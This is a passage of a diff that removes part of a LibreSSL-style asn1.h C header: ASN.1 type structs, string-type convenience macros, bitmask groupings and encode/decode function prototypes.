-				ASN1_STRFLGS_ESC_MSB | \
-				ASN1_STRFLGS_UTF8_CONVERT | \
-				ASN1_STRFLGS_DUMP_UNKNOWN | \
-				ASN1_STRFLGS_DUMP_DER)
-
-DECLARE_STACK_OF(ASN1_INTEGER)
-
-DECLARE_STACK_OF(ASN1_GENERALSTRING)
-
-typedef struct asn1_type_st {
-	int type;
-	union {
-		char *ptr;
-		ASN1_BOOLEAN		boolean;
-		ASN1_STRING *		asn1_string;
-		ASN1_OBJECT *		object;
-		ASN1_INTEGER *		integer;
-		ASN1_ENUMERATED *	enumerated;
-		ASN1_BIT_STRING *	bit_string;
-		ASN1_OCTET_STRING *	octet_string;
-		ASN1_PRINTABLESTRING *	printablestring;
-		ASN1_T61STRING *	t61string;
-		ASN1_IA5STRING *	ia5string;
-		ASN1_GENERALSTRING *	generalstring;
-		ASN1_BMPSTRING *	bmpstring;
-		ASN1_UNIVERSALSTRING *	universalstring;
-		ASN1_UTCTIME *		utctime;
-		ASN1_GENERALIZEDTIME *	generalizedtime;
-		ASN1_VISIBLESTRING *	visiblestring;
-		ASN1_UTF8STRING *	utf8string;
-		/* set and sequence are left complete and still
-		 * contain the set or sequence bytes */
-		ASN1_STRING *		set;
-		ASN1_STRING *		sequence;
-		ASN1_VALUE *		asn1_value;
-	} value;
-} ASN1_TYPE;
-
-DECLARE_STACK_OF(ASN1_TYPE)
-
-typedef STACK_OF(ASN1_TYPE) ASN1_SEQUENCE_ANY;
-
-ASN1_SEQUENCE_ANY *d2i_ASN1_SEQUENCE_ANY(ASN1_SEQUENCE_ANY **a, const unsigned char **in, long len);
-int i2d_ASN1_SEQUENCE_ANY(const ASN1_SEQUENCE_ANY *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_SEQUENCE_ANY_it;
-ASN1_SEQUENCE_ANY *d2i_ASN1_SET_ANY(ASN1_SEQUENCE_ANY **a, const unsigned char **in, long len);
-int i2d_ASN1_SET_ANY(const ASN1_SEQUENCE_ANY *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_SET_ANY_it;
-
-typedef struct NETSCAPE_X509_st {
-	ASN1_OCTET_STRING *header;
-	X509 *cert;
-} NETSCAPE_X509;
-
-/* This is used to contain a list of bit names */
-typedef struct BIT_STRING_BITNAME_st {
-	int bitnum;
-	const char *lname;
-	const char *sname;
-} BIT_STRING_BITNAME;
-
-#ifndef LIBRESSL_INTERNAL
-
-#define M_ASN1_STRING_length(x)	((x)->length)
-#define M_ASN1_STRING_length_set(x, n)	((x)->length = (n))
-#define M_ASN1_STRING_type(x)	((x)->type)
-#define M_ASN1_STRING_data(x)	((x)->data)
-
-/* Macros for string operations */
-#define M_ASN1_BIT_STRING_new()	(ASN1_BIT_STRING *)\
-		ASN1_STRING_type_new(V_ASN1_BIT_STRING)
-#define M_ASN1_BIT_STRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_BIT_STRING_dup(a) (ASN1_BIT_STRING *)\
-		ASN1_STRING_dup((const ASN1_STRING *)a)
-#define M_ASN1_BIT_STRING_cmp(a,b) ASN1_STRING_cmp(\
-		(const ASN1_STRING *)a,(const ASN1_STRING *)b)
-#define M_ASN1_BIT_STRING_set(a,b,c) ASN1_STRING_set((ASN1_STRING *)a,b,c)
-
-#define M_ASN1_INTEGER_new()	(ASN1_INTEGER *)\
-		ASN1_STRING_type_new(V_ASN1_INTEGER)
-#define M_ASN1_INTEGER_free(a)		ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_INTEGER_dup(a) (ASN1_INTEGER *)\
-		ASN1_STRING_dup((const ASN1_STRING *)a)
-#define M_ASN1_INTEGER_cmp(a,b)	ASN1_STRING_cmp(\
-		(const ASN1_STRING *)a,(const ASN1_STRING *)b)
-
-#define M_ASN1_ENUMERATED_new()	(ASN1_ENUMERATED *)\
-		ASN1_STRING_type_new(V_ASN1_ENUMERATED)
-#define M_ASN1_ENUMERATED_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_ENUMERATED_dup(a) (ASN1_ENUMERATED *)\
-		ASN1_STRING_dup((const ASN1_STRING *)a)
-#define M_ASN1_ENUMERATED_cmp(a,b)	ASN1_STRING_cmp(\
-		(const ASN1_STRING *)a,(const ASN1_STRING *)b)
-
-#define M_ASN1_OCTET_STRING_new()	(ASN1_OCTET_STRING *)\
-		ASN1_STRING_type_new(V_ASN1_OCTET_STRING)
-#define M_ASN1_OCTET_STRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_OCTET_STRING_dup(a) (ASN1_OCTET_STRING *)\
-		ASN1_STRING_dup((const ASN1_STRING *)a)
-#define M_ASN1_OCTET_STRING_cmp(a,b) ASN1_STRING_cmp(\
-		(const ASN1_STRING *)a,(const ASN1_STRING *)b)
-#define M_ASN1_OCTET_STRING_set(a,b,c)	ASN1_STRING_set((ASN1_STRING *)a,b,c)
-#define M_ASN1_OCTET_STRING_print(a,b)	ASN1_STRING_print(a,(ASN1_STRING *)b)
-#define M_i2d_ASN1_OCTET_STRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_OCTET_STRING,\
-		V_ASN1_UNIVERSAL)
-
-#define M_ASN1_PRINTABLE_new()	ASN1_STRING_type_new(V_ASN1_T61STRING)
-#define M_ASN1_PRINTABLE_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_PRINTABLE(a,pp) i2d_ASN1_bytes((ASN1_STRING *)a,\
-		pp,a->type,V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_PRINTABLE(a,pp,l) \
-		d2i_ASN1_type_bytes((ASN1_STRING **)a,pp,l, \
-			B_ASN1_PRINTABLE)
-
-#define M_DIRECTORYSTRING_new() ASN1_STRING_type_new(V_ASN1_PRINTABLESTRING)
-#define M_DIRECTORYSTRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_DIRECTORYSTRING(a,pp) i2d_ASN1_bytes((ASN1_STRING *)a,\
-						pp,a->type,V_ASN1_UNIVERSAL)
-#define M_d2i_DIRECTORYSTRING(a,pp,l) \
-		d2i_ASN1_type_bytes((ASN1_STRING **)a,pp,l, \
-			B_ASN1_DIRECTORYSTRING)
-
-#define M_DISPLAYTEXT_new() ASN1_STRING_type_new(V_ASN1_VISIBLESTRING)
-#define M_DISPLAYTEXT_free(a) ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_DISPLAYTEXT(a,pp) i2d_ASN1_bytes((ASN1_STRING *)a,\
-						pp,a->type,V_ASN1_UNIVERSAL)
-#define M_d2i_DISPLAYTEXT(a,pp,l) \
-		d2i_ASN1_type_bytes((ASN1_STRING **)a,pp,l, \
-			B_ASN1_DISPLAYTEXT)
-
-#define M_ASN1_PRINTABLESTRING_new() (ASN1_PRINTABLESTRING *)\
-		ASN1_STRING_type_new(V_ASN1_PRINTABLESTRING)
-#define M_ASN1_PRINTABLESTRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_PRINTABLESTRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_PRINTABLESTRING,\
-		V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_PRINTABLESTRING(a,pp,l) \
-		(ASN1_PRINTABLESTRING *)d2i_ASN1_type_bytes\
-		((ASN1_STRING **)a,pp,l,B_ASN1_PRINTABLESTRING)
-
-#define M_ASN1_T61STRING_new()	(ASN1_T61STRING *)\
-		ASN1_STRING_type_new(V_ASN1_T61STRING)
-#define M_ASN1_T61STRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_T61STRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_T61STRING,\
-		V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_T61STRING(a,pp,l) \
-		(ASN1_T61STRING *)d2i_ASN1_type_bytes\
-		((ASN1_STRING **)a,pp,l,B_ASN1_T61STRING)
-
-#define M_ASN1_IA5STRING_new()	(ASN1_IA5STRING *)\
-		ASN1_STRING_type_new(V_ASN1_IA5STRING)
-#define M_ASN1_IA5STRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_IA5STRING_dup(a)	\
-		(ASN1_IA5STRING *)ASN1_STRING_dup((const ASN1_STRING *)a)
-#define M_i2d_ASN1_IA5STRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_IA5STRING,\
-			V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_IA5STRING(a,pp,l) \
-		(ASN1_IA5STRING *)d2i_ASN1_type_bytes((ASN1_STRING **)a,pp,l,\
-			B_ASN1_IA5STRING)
-
-#define M_ASN1_UTCTIME_new()	(ASN1_UTCTIME *)\
-		ASN1_STRING_type_new(V_ASN1_UTCTIME)
-#define M_ASN1_UTCTIME_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_UTCTIME_dup(a) (ASN1_UTCTIME *)\
-		ASN1_STRING_dup((const ASN1_STRING *)a)
-
-#define M_ASN1_GENERALIZEDTIME_new()	(ASN1_GENERALIZEDTIME *)\
-		ASN1_STRING_type_new(V_ASN1_GENERALIZEDTIME)
-#define M_ASN1_GENERALIZEDTIME_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_GENERALIZEDTIME_dup(a) (ASN1_GENERALIZEDTIME *)ASN1_STRING_dup(\
-	(const ASN1_STRING *)a)
-
-#define M_ASN1_TIME_new()	(ASN1_TIME *)\
-		ASN1_STRING_type_new(V_ASN1_UTCTIME)
-#define M_ASN1_TIME_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_TIME_dup(a) (ASN1_TIME *)\
-	ASN1_STRING_dup((const ASN1_STRING *)a)
-
-#define M_ASN1_GENERALSTRING_new()	(ASN1_GENERALSTRING *)\
-		ASN1_STRING_type_new(V_ASN1_GENERALSTRING)
-#define M_ASN1_GENERALSTRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_GENERALSTRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_GENERALSTRING,\
-			V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_GENERALSTRING(a,pp,l) \
-		(ASN1_GENERALSTRING *)d2i_ASN1_type_bytes\
-		((ASN1_STRING **)a,pp,l,B_ASN1_GENERALSTRING)
-
-#define M_ASN1_UNIVERSALSTRING_new()	(ASN1_UNIVERSALSTRING *)\
-		ASN1_STRING_type_new(V_ASN1_UNIVERSALSTRING)
-#define M_ASN1_UNIVERSALSTRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_UNIVERSALSTRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_UNIVERSALSTRING,\
-			V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_UNIVERSALSTRING(a,pp,l) \
-		(ASN1_UNIVERSALSTRING *)d2i_ASN1_type_bytes\
-		((ASN1_STRING **)a,pp,l,B_ASN1_UNIVERSALSTRING)
-
-#define M_ASN1_BMPSTRING_new()	(ASN1_BMPSTRING *)\
-		ASN1_STRING_type_new(V_ASN1_BMPSTRING)
-#define M_ASN1_BMPSTRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_BMPSTRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_BMPSTRING,\
-			V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_BMPSTRING(a,pp,l) \
-		(ASN1_BMPSTRING *)d2i_ASN1_type_bytes\
-		((ASN1_STRING **)a,pp,l,B_ASN1_BMPSTRING)
-
-#define M_ASN1_VISIBLESTRING_new()	(ASN1_VISIBLESTRING *)\
-		ASN1_STRING_type_new(V_ASN1_VISIBLESTRING)
-#define M_ASN1_VISIBLESTRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_VISIBLESTRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_VISIBLESTRING,\
-			V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_VISIBLESTRING(a,pp,l) \
-		(ASN1_VISIBLESTRING *)d2i_ASN1_type_bytes\
-		((ASN1_STRING **)a,pp,l,B_ASN1_VISIBLESTRING)
-
-#define M_ASN1_UTF8STRING_new()	(ASN1_UTF8STRING *)\
-		ASN1_STRING_type_new(V_ASN1_UTF8STRING)
-#define M_ASN1_UTF8STRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_UTF8STRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_UTF8STRING,\
-			V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_UTF8STRING(a,pp,l) \
-		(ASN1_UTF8STRING *)d2i_ASN1_type_bytes\
-		((ASN1_STRING **)a,pp,l,B_ASN1_UTF8STRING)
-
-#endif /* !LIBRESSL_INTERNAL */
-
-#define B_ASN1_TIME \
-			B_ASN1_UTCTIME | \
-			B_ASN1_GENERALIZEDTIME
-
-#define B_ASN1_PRINTABLE \
-			B_ASN1_NUMERICSTRING| \
-			B_ASN1_PRINTABLESTRING| \
-			B_ASN1_T61STRING| \
-			B_ASN1_IA5STRING| \
-			B_ASN1_BIT_STRING| \
-			B_ASN1_UNIVERSALSTRING|\
-			B_ASN1_BMPSTRING|\
-			B_ASN1_UTF8STRING|\
-			B_ASN1_SEQUENCE|\
-			B_ASN1_UNKNOWN
-
-#define B_ASN1_DIRECTORYSTRING \
-			B_ASN1_PRINTABLESTRING| \
-			B_ASN1_TELETEXSTRING|\
-			B_ASN1_BMPSTRING|\
-			B_ASN1_UNIVERSALSTRING|\
-			B_ASN1_UTF8STRING
-
-#define B_ASN1_DISPLAYTEXT \
-			B_ASN1_IA5STRING| \
-			B_ASN1_VISIBLESTRING| \
-			B_ASN1_BMPSTRING|\
-			B_ASN1_UTF8STRING
-
-/* for the is_set parameter to i2d_ASN1_SET */
-#define IS_SEQUENCE	0
-#define IS_SET		1
-
-ASN1_TYPE *ASN1_TYPE_new(void);
-void ASN1_TYPE_free(ASN1_TYPE *a);
-ASN1_TYPE *d2i_ASN1_TYPE(ASN1_TYPE **a, const unsigned char **in, long len);
-int i2d_ASN1_TYPE(ASN1_TYPE *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_ANY_it;
-
-int ASN1_TYPE_get(ASN1_TYPE *a);
-void ASN1_TYPE_set(ASN1_TYPE *a, int type, void *value);
-int ASN1_TYPE_set1(ASN1_TYPE *a, int type, const void *value);
-int ASN1_TYPE_cmp(ASN1_TYPE *a, ASN1_TYPE *b);
-
-ASN1_OBJECT *ASN1_OBJECT_new(void );
-void ASN1_OBJECT_free(ASN1_OBJECT *a);
-int i2d_ASN1_OBJECT(ASN1_OBJECT *a, unsigned char **pp);
-ASN1_OBJECT *c2i_ASN1_OBJECT(ASN1_OBJECT **a, const unsigned char **pp,
-    long length);
-ASN1_OBJECT *d2i_ASN1_OBJECT(ASN1_OBJECT **a, const unsigned char **pp,
-    long length);
-
-extern const ASN1_ITEM ASN1_OBJECT_it;
-
-DECLARE_STACK_OF(ASN1_OBJECT)
-
-ASN1_STRING *ASN1_STRING_new(void);
-void ASN1_STRING_free(ASN1_STRING *a);
-int ASN1_STRING_copy(ASN1_STRING *dst, const ASN1_STRING *str);
-ASN1_STRING *ASN1_STRING_dup(const ASN1_STRING *a);
-ASN1_STRING *ASN1_STRING_type_new(int type );
-int ASN1_STRING_cmp(const ASN1_STRING *a, const ASN1_STRING *b);
-  /* Since this is used to store all sorts of things, via macros, for now, make
-     its data void * */
-int ASN1_STRING_set(ASN1_STRING *str, const void *data, int len);
-void ASN1_STRING_set0(ASN1_STRING *str, void *data, int len);
-int ASN1_STRING_length(const ASN1_STRING *x);
-void ASN1_STRING_length_set(ASN1_STRING *x, int n);
-int ASN1_STRING_type(ASN1_STRING *x);
-unsigned char * ASN1_STRING_data(ASN1_STRING *x);
-
-ASN1_BIT_STRING *ASN1_BIT_STRING_new(void);
-void ASN1_BIT_STRING_free(ASN1_BIT_STRING *a);
-ASN1_BIT_STRING *d2i_ASN1_BIT_STRING(ASN1_BIT_STRING **a, const unsigned char **in, long len);
-int i2d_ASN1_BIT_STRING(ASN1_BIT_STRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_BIT_STRING_it;
-int i2c_ASN1_BIT_STRING(ASN1_BIT_STRING *a, unsigned char **pp);
-ASN1_BIT_STRING *c2i_ASN1_BIT_STRING(ASN1_BIT_STRING **a,
-    const unsigned char **pp, long length);
-int ASN1_BIT_STRING_set(ASN1_BIT_STRING *a, unsigned char *d, int length );
-int ASN1_BIT_STRING_set_bit(ASN1_BIT_STRING *a, int n, int value);
-int ASN1_BIT_STRING_get_bit(ASN1_BIT_STRING *a, int n);
-int ASN1_BIT_STRING_check(ASN1_BIT_STRING *a,
-    unsigned char *flags, int flags_len);
-
-#ifndef OPENSSL_NO_BIO
-int ASN1_BIT_STRING_name_print(BIO *out, ASN1_BIT_STRING *bs,
-    BIT_STRING_BITNAME *tbl, int indent);
-#endif
-int ASN1_BIT_STRING_num_asc(char *name, BIT_STRING_BITNAME *tbl);
-int ASN1_BIT_STRING_set_asc(ASN1_BIT_STRING *bs, char *name, int value,
-    BIT_STRING_BITNAME *tbl);
-
-int i2d_ASN1_BOOLEAN(int a, unsigned char **pp);
-int d2i_ASN1_BOOLEAN(int *a, const unsigned char **pp, long length);
-
-ASN1_INTEGER *ASN1_INTEGER_new(void);
-void ASN1_INTEGER_free(ASN1_INTEGER *a);
-ASN1_INTEGER *d2i_ASN1_INTEGER(ASN1_INTEGER **a, const unsigned char **in, long len);
-int i2d_ASN1_INTEGER(ASN1_INTEGER *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_INTEGER_it;
-int i2c_ASN1_INTEGER(ASN1_INTEGER *a, unsigned char **pp);
-ASN1_INTEGER *c2i_ASN1_INTEGER(ASN1_INTEGER **a, const unsigned char **pp,
-    long length);
-ASN1_INTEGER *d2i_ASN1_UINTEGER(ASN1_INTEGER **a, const unsigned char **pp,
-    long length);
-ASN1_INTEGER *	ASN1_INTEGER_dup(const ASN1_INTEGER *x);
-int ASN1_INTEGER_cmp(const ASN1_INTEGER *x, const ASN1_INTEGER *y);
-
-ASN1_ENUMERATED *ASN1_ENUMERATED_new(void);
-void ASN1_ENUMERATED_free(ASN1_ENUMERATED *a);
-ASN1_ENUMERATED *d2i_ASN1_ENUMERATED(ASN1_ENUMERATED **a, const unsigned char **in, long len);
-int i2d_ASN1_ENUMERATED(ASN1_ENUMERATED *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_ENUMERATED_it;
-
-int ASN1_UTCTIME_check(ASN1_UTCTIME *a);
-ASN1_UTCTIME *ASN1_UTCTIME_set(ASN1_UTCTIME *s, time_t t);
-ASN1_UTCTIME *ASN1_UTCTIME_adj(ASN1_UTCTIME *s, time_t t,
-    int offset_day, long offset_sec);
-int ASN1_UTCTIME_set_string(ASN1_UTCTIME *s, const char *str);
-
-#ifndef LIBRESSL_INTERNAL
-int ASN1_UTCTIME_cmp_time_t(const ASN1_UTCTIME *s, time_t t);
-#endif /* !LIBRESSL_INTERNAL */
-
-int ASN1_GENERALIZEDTIME_check(ASN1_GENERALIZEDTIME *a);
-ASN1_GENERALIZEDTIME *ASN1_GENERALIZEDTIME_set(ASN1_GENERALIZEDTIME *s,
-    time_t t);
-ASN1_GENERALIZEDTIME *ASN1_GENERALIZEDTIME_adj(ASN1_GENERALIZEDTIME *s,
-    time_t t, int offset_day, long offset_sec);
-int ASN1_GENERALIZEDTIME_set_string(ASN1_GENERALIZEDTIME *s, const char *str);
-
-ASN1_OCTET_STRING *ASN1_OCTET_STRING_new(void);
-void ASN1_OCTET_STRING_free(ASN1_OCTET_STRING *a);
-ASN1_OCTET_STRING *d2i_ASN1_OCTET_STRING(ASN1_OCTET_STRING **a, const unsigned char **in, long len);
-int i2d_ASN1_OCTET_STRING(ASN1_OCTET_STRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_OCTET_STRING_it;
-ASN1_OCTET_STRING *ASN1_OCTET_STRING_dup(const ASN1_OCTET_STRING *a);
-int ASN1_OCTET_STRING_cmp(const ASN1_OCTET_STRING *a,
-    const ASN1_OCTET_STRING *b);
-int ASN1_OCTET_STRING_set(ASN1_OCTET_STRING *str, const unsigned char *data,
-    int len);
-
-ASN1_VISIBLESTRING *ASN1_VISIBLESTRING_new(void);
-void ASN1_VISIBLESTRING_free(ASN1_VISIBLESTRING *a);
-ASN1_VISIBLESTRING *d2i_ASN1_VISIBLESTRING(ASN1_VISIBLESTRING **a, const unsigned char **in, long len);
-int i2d_ASN1_VISIBLESTRING(ASN1_VISIBLESTRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_VISIBLESTRING_it;
-ASN1_UNIVERSALSTRING *ASN1_UNIVERSALSTRING_new(void);
-void ASN1_UNIVERSALSTRING_free(ASN1_UNIVERSALSTRING *a);
-ASN1_UNIVERSALSTRING *d2i_ASN1_UNIVERSALSTRING(ASN1_UNIVERSALSTRING **a, const unsigned char **in, long len);
-int i2d_ASN1_UNIVERSALSTRING(ASN1_UNIVERSALSTRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_UNIVERSALSTRING_it;
-ASN1_UTF8STRING *ASN1_UTF8STRING_new(void);
-void ASN1_UTF8STRING_free(ASN1_UTF8STRING *a);
-ASN1_UTF8STRING *d2i_ASN1_UTF8STRING(ASN1_UTF8STRING **a, const unsigned char **in, long len);
-int i2d_ASN1_UTF8STRING(ASN1_UTF8STRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_UTF8STRING_it;
-ASN1_NULL *ASN1_NULL_new(void);
-void ASN1_NULL_free(ASN1_NULL *a);
-ASN1_NULL *d2i_ASN1_NULL(ASN1_NULL **a, const unsigned char **in, long len);
-int i2d_ASN1_NULL(ASN1_NULL *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_NULL_it;
-ASN1_BMPSTRING *ASN1_BMPSTRING_new(void);
-void ASN1_BMPSTRING_free(ASN1_BMPSTRING *a);
-ASN1_BMPSTRING *d2i_ASN1_BMPSTRING(ASN1_BMPSTRING **a, const unsigned char **in, long len);
-int i2d_ASN1_BMPSTRING(ASN1_BMPSTRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_BMPSTRING_it;
-
-ASN1_STRING *ASN1_PRINTABLE_new(void);
-void ASN1_PRINTABLE_free(ASN1_STRING *a);
-ASN1_STRING *d2i_ASN1_PRINTABLE(ASN1_STRING **a, const unsigned char **in, long len);
-int i2d_ASN1_PRINTABLE(ASN1_STRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_PRINTABLE_it;
-
-ASN1_STRING *DIRECTORYSTRING_new(void);
-void DIRECTORYSTRING_free(ASN1_STRING *a);
-ASN1_STRING *d2i_DIRECTORYSTRING(ASN1_STRING **a, const unsigned char **in, long len);
-int i2d_DIRECTORYSTRING(ASN1_STRING *a, unsigned char **out);
-extern const ASN1_ITEM DIRECTORYSTRING_it;
-ASN1_STRING *DISPLAYTEXT_new(void);
-void DISPLAYTEXT_free(ASN1_STRING *a);
-ASN1_STRING *d2i_DISPLAYTEXT(ASN1_STRING **a, const unsigned char **in, long len);
-int i2d_DISPLAYTEXT(ASN1_STRING *a, unsigned char **out);
-extern const ASN1_ITEM DISPLAYTEXT_it;
-ASN1_PRINTABLESTRING *ASN1_PRINTABLESTRING_new(void);
-void ASN1_PRINTABLESTRING_free(ASN1_PRINTABLESTRING *a);
-ASN1_PRINTABLESTRING *d2i_ASN1_PRINTABLESTRING(ASN1_PRINTABLESTRING **a, const unsigned char **in, long len);
-int i2d_ASN1_PRINTABLESTRING(ASN1_PRINTABLESTRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_PRINTABLESTRING_it;
-ASN1_T61STRING *ASN1_T61STRING_new(void);
-void ASN1_T61STRING_free(ASN1_T61STRING *a);
-ASN1_T61STRING *d2i_ASN1_T61STRING(ASN1_T61STRING **a, const unsigned char **in, long len);
-int i2d_ASN1_T61STRING(ASN1_T61STRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_T61STRING_it;
-ASN1_IA5STRING *ASN1_IA5STRING_new(void);
-void ASN1_IA5STRING_free(ASN1_IA5STRING *a);
-ASN1_IA5STRING *d2i_ASN1_IA5STRING(ASN1_IA5STRING **a, const unsigned char **in, long len);
-int i2d_ASN1_IA5STRING(ASN1_IA5STRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_IA5STRING_it;
-ASN1_GENERALSTRING *ASN1_GENERALSTRING_new(void);
-void ASN1_GENERALSTRING_free(ASN1_GENERALSTRING *a);
-ASN1_GENERALSTRING *d2i_ASN1_GENERALSTRING(ASN1_GENERALSTRING **a, const unsigned char **in, long len);
-int i2d_ASN1_GENERALSTRING(ASN1_GENERALSTRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_GENERALSTRING_it;
-ASN1_UTCTIME *ASN1_UTCTIME_new(void);
-void ASN1_UTCTIME_free(ASN1_UTCTIME *a);
-ASN1_UTCTIME *d2i_ASN1_UTCTIME(ASN1_UTCTIME **a, const unsigned char **in, long len);
-int i2d_ASN1_UTCTIME(ASN1_UTCTIME *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_UTCTIME_it;
-ASN1_GENERALIZEDTIME *ASN1_GENERALIZEDTIME_new(void);
-void ASN1_GENERALIZEDTIME_free(ASN1_GENERALIZEDTIME *a);
-ASN1_GENERALIZEDTIME *d2i_ASN1_GENERALIZEDTIME(ASN1_GENERALIZEDTIME **a, const unsigned char **in, long len);
-int i2d_ASN1_GENERALIZEDTIME(ASN1_GENERALIZEDTIME *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_GENERALIZEDTIME_it;
-ASN1_TIME *ASN1_TIME_new(void);
-void ASN1_TIME_free(ASN1_TIME *a);
-ASN1_TIME *d2i_ASN1_TIME(ASN1_TIME **a, const unsigned char **in, long len);
-int i2d_ASN1_TIME(ASN1_TIME *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_TIME_it;
-
-extern const ASN1_ITEM ASN1_OCTET_STRING_NDEF_it;
-
-ASN1_TIME *ASN1_TIME_set(ASN1_TIME *s, time_t t);
-ASN1_TIME *ASN1_TIME_set_tm(ASN1_TIME *s, struct tm *tm);
-ASN1_TIME *ASN1_TIME_adj(ASN1_TIME *s, time_t t, int offset_day,
-    long offset_sec);
-int ASN1_TIME_check(ASN1_TIME *t);
-ASN1_GENERALIZEDTIME *ASN1_TIME_to_generalizedtime(ASN1_TIME *t,
-    ASN1_GENERALIZEDTIME **out);
-int ASN1_TIME_set_string(ASN1_TIME *s, const char *str);
-
-int i2d_ASN1_SET(STACK_OF(OPENSSL_BLOCK) *a, unsigned char **pp,
-    i2d_of_void *i2d, int ex_tag, int ex_class, int is_set);
-STACK_OF(OPENSSL_BLOCK) *d2i_ASN1_SET(STACK_OF(OPENSSL_BLOCK) **a,
-    const unsigned char **pp, long length, d2i_of_void *d2i,
-    void (*free_func)(OPENSSL_BLOCK), int ex_tag, int ex_class);
-
-#ifndef OPENSSL_NO_BIO
-int i2a_ASN1_INTEGER(BIO *bp, ASN1_INTEGER *a);
-int a2i_ASN1_INTEGER(BIO *bp, ASN1_INTEGER *bs, char *buf, int size);
-int i2a_ASN1_ENUMERATED(BIO *bp, ASN1_ENUMERATED *a);
-int a2i_ASN1_ENUMERATED(BIO *bp, ASN1_ENUMERATED *bs, char *buf, int size);
-int i2a_ASN1_OBJECT(BIO *bp, ASN1_OBJECT *a);
-int a2i_ASN1_STRING(BIO *bp, ASN1_STRING *bs, char *buf, int size);
-int i2a_ASN1_STRING(BIO *bp, ASN1_STRING *a, int type);
-#endif
-int i2t_ASN1_OBJECT(char *buf, int buf_len, ASN1_OBJECT *a);
-
-int a2d_ASN1_OBJECT(unsigned char *out, int olen, const char *buf, int num);
-ASN1_OBJECT *ASN1_OBJECT_create(int nid, unsigned char *data, int len,
-    const char *sn, const char *ln);
-
-int ASN1_INTEGER_set(ASN1_INTEGER *a, long v);
-long ASN1_INTEGER_get(const ASN1_INTEGER *a);
-ASN1_INTEGER *BN_to_ASN1_INTEGER(const BIGNUM *bn, ASN1_INTEGER *ai);
-BIGNUM *ASN1_INTEGER_to_BN(const ASN1_INTEGER *ai, BIGNUM *bn);
-
-int ASN1_ENUMERATED_set(ASN1_ENUMERATED *a, long v);
-long ASN1_ENUMERATED_get(ASN1_ENUMERATED *a);
-ASN1_ENUMERATED *BN_to_ASN1_ENUMERATED(BIGNUM *bn, ASN1_ENUMERATED *ai);
-BIGNUM *ASN1_ENUMERATED_to_BN(ASN1_ENUMERATED *ai, BIGNUM *bn);
-
-/* General */
-/* given a string, return the correct type, max is the maximum length */
-int ASN1_PRINTABLE_type(const unsigned char *s, int max);
-
-int i2d_ASN1_bytes(ASN1_STRING *a, unsigned char **pp, int tag, int xclass);
-ASN1_STRING *d2i_ASN1_bytes(ASN1_STRING **a, const unsigned char **pp,
-    long length, int Ptag, int Pclass);
-unsigned long ASN1_tag2bit(int tag);
-/* type is one or more of the B_ASN1_ values. */
-ASN1_STRING *d2i_ASN1_type_bytes(ASN1_STRING **a, const unsigned char **pp,
-    long length, int type);
-
-/* PARSING */
-int asn1_Finish(ASN1_CTX *c);
-int asn1_const_Finish(ASN1_const_CTX *c);
-
-/* SPECIALS */
-int ASN1_get_object(const unsigned char **pp, long *plength, int *ptag,
